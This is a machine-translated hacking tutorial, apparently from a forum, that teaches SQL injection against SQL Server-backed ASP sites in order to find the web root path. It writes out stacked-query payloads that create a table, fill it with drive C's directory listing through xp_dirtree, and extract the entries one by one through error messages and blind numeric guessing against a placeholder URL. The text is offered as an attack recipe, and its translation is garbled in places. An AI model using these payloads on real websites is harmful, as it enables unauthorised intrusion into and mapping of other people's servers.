SQLServer several methods and comparisons for obtaining website paths if the website only opens port 80, you will find that the following methods are more useful, and the methods used are almost none I have found, there are four methods of personal experience and skills for injection (currently known)
Method 1:
This is < <怪异的sql注入 designtimesp="16725"> >.
Take advantage of sqlserver's xp_dirtree. Okay, let's take a look at the method first, and then let's talk about its advantages and disadvantages (based on the original article)
Create a table
Statement: http://www.xxxxx.com/down/list.asp? Id = 1; create table dirs (paths varchar (1000 ))--
Return: normal information! The table is successfully created! Continue!
(This is a little bigger than the original one, because I deleted the id of a file with a long name, because it is useless.
Statement: http://www.xxxxx.com/down/list.asp? Id = 1; insert dirs exec master. dbo. xp_dirtree 'C :/'--
Return: normal information. It indicates that all the directories on drive C are successfully written! Great! The next step is to retrieve the table! Let it go. (It seems that this method is the only one)
Statement: http://www.xxxxx.com/down/list.asp? Id = 1 and 0 <> (select top 1 paths from dirs )-
Return: Microsoft ole db Provider for SQL Server error 80040e07
A syntax error occurs when you convert the varchar value '@ inetpub' to a column whose data type is int.
The directory name in the table is displayed in sequence!
Statement: http: // http://www.xxxxx.com/down/list.asp? Id = 1 and 0 <> (select top 1 paths from
Dirs where paths not in ('@ inetpub '))--
Return: Microsoft ole db Provider for SQL Server error 80040e07
A syntax error occurs when you convert the varchar value 'test' to a column whose data type is int.
The directory name in the table is displayed in sequence!
Okay. let's continue.
Statement:
Http: // http://www.xxxxx.com/down/list.asp? Id = 1 and 0 <> (select top 1 paths from
Dirs where paths not in ('@ inetpub', 'test '))--
Return: Microsoft ole db Provider for SQL Server error 80040e07
A syntax error occurs when the varchar value 'hahaha' is converted to a column whose data type is int.
The directory name in the table is displayed in sequence!
Well, you should know how to do it. haha, you just need to add the name of the obtained table to the brackets and put it in the brackets,
Tips:
Sometimes you will find that when the input is similar
Http://www.xxxxx.com/down/list.asp? Id = 1 and 0 <> (select top 1 paths from dirs )-
The error is not displayed, but the webpage is displayed normally.
Dizzy. Don't be nervous.
Check if 0 <> (select top 1 paths from dirs) indicates that a number is returned,
Haha, test it to see what it is.
100> (select top 1 paths from dirs)
Return normal
Haha, you can quickly guess with this method greater than or less.
Okay. let's continue.
For example
59 = (select top 1 paths from dirs)
Returns normal,
OK. The name is 59.
Enter the following
Http: // http://www.xxxxx.com/down/list.asp? Id = 1 and 0 <> (select top 1 paths from
Dirs where paths not in ('59 '))--
Remember to enclose the quotation marks
The following method is the same as the original one.